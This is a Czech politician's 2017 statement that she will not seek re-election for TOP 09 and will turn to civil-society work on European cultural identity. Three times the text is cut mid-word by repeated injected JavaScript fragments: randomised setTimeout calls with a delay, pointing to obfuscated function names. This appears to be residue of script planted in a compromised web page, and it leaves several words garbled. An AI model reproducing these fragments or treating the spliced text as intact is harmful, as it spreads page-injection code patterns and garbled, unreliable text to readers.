Prioritou je pro mě občanská společnost, ne vysoká politika

Červenec 31, 2017

Prohlášení poslankyně TOP 09

Po pečlivém zvážení jsem se rozhodla nekandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}idovat do Poslanecké sněmovny PČR a vzdát se svého místa na kandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}idátce TOP 09.

Jsem zastáncem konzervativních hodnot a svobodné občanské společnosti. V Parlamentu jsem se zasazovala o větší podporu rodiny a zákonné změny ve školství. Věřím, že, v souladu s aktuální realitou i potřebami budoucnosti, je nutné ukotvit do obecných cílů vzdělávání v České republice evropské kulturní tradice a hodnoty, založené na antické vzdělanosti, křesťanství a humanismu.

Tématům evropské kulturní identity se budu dál věnovat v rámci mezinárodní, středoevropské platformy spolu s aktivními osobnostmi ze Slovenska, Rakouska, Maďarska a Polska. Za současné politické a společenské situace to považuji za mnohem prospěšnější než boj o setrvání ve vysoké politice.

Děkuji svým voličům a všem, kteří mi fandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ili, za jejich podporu. Velmi jsem si jí vážila, vážím a dál na ni spoléhám. Ráda bych také ujistila občanská sdružení a všechny, kteří se na mě v době mé práce v Poslanecké sněmovně obraceli, že stále budu na jejich straně.

 

 

Nina Nováková